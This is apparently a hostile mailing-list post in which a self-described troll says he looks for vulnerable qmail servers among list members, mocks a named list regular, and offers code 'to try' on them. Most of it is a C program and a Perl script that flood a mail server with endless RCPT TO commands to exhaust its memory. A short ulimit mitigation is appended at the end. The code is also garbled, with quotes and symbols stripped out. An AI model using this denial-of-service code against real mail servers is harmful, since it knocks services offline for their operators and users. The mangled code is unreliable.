I'm a little Troll, I'm looking for some servers to exploit. I look through this list
to find the vulnerable qmail servers; you know, newbies that give out tooo much info
because the list regulars like Frank Tegtmeyer beat up on newbies and pressure them to
give out way too much info.
Any of you guys ever see your company's computer guy on SNL? That is some funny
shit. Well you guys know who you are.
here is some code to try ya'll, once you get the info you need.
/*
* qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
* amount of recipients.
*
* Usage: qmail-dos-2 fully-qualified-hostname
*
* Author: Wietse Venema. The author is not responsible for abuse of this
* program. Use at your own risk.
*/
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include netdb.h
#include string.h
#include stdarg.h
#include errno.h
#include stdio.h
voidfatal(char *fmt,...)
{
va_list ap;
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}
chat(FILE * fp, char *fmt,...)
{
charbuf[BUFSIZ];
va_list ap;
fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs(\r\n, fp);
if (fflush(fp))
fatal(connection lost);
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal(connection lost);
if (atoi(buf) / 100 != 2)
fatal(%s, buf);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
charbuf[BUFSIZ];
int sock;
FILE *fp;
if (argc != 2)
fatal(usage: %s host, argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal(host %s not found, argv[1]);
memset((char *) sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) sin.sin_addr, hp-h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) 0)
fatal(socket: %s, strerror(errno));
if (connect(sock, (struct sockaddr *) sin, sizeof(sin)) 0)
fatal(connect to %s: %s, argv[1], strerror(errno));
if ((fp = fdopen(sock, r+)) == 0)
fatal(fdopen: %s, strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal(connection lost);
chat(fp, mail from:me@me, fp);
for (;;)
chat(fp, rcpt to:me@%s, argv[1]);
}
/*
-- qmail.pl --
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;
if(!($ARGV[0])){print(usage: $0 FQDN,\n);exit;}
my $port = 25; my $proto = getprotobyname(tcp);
my $iaddr = inet_aton($ARGV[0]) || die No such host: $ARGV[0];
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die socket() $!;
connect(SKT, $paddr) print(Connected established.\n) || die connect() $!;
send(SKT,mail from: me\@me\n,0) || die send() $!;
my $infstr = rcpt to: me\@ . $ARGV[0] . \n; print(Attacking..,\n);
while(SKT){
send(SKT,$infstr,0) || die send() $!;
}
die Connection lost!;
-- qmail.pl --
*/
/* Here is the Patch for qmail -
If you are using tcpserver it should be sufficient to set the ulimit
once in the startup script. All instances of qmail-smtpd inherit the
limit without further overhead. Seems to be working fine here.
echo Starting tcpserver for qmail-smtpd...
ulimit -d 2048
/usr/local/bin/tcpserver -v -u 61 -g 61 0 smtp /usr/local/bin/tcpcontrol \
/etc/tcp.smtp.cdb /var/qmail/bin/qmail-smtpd 21 | \
/var/qmail/bin/splogger smtpd 3
*/
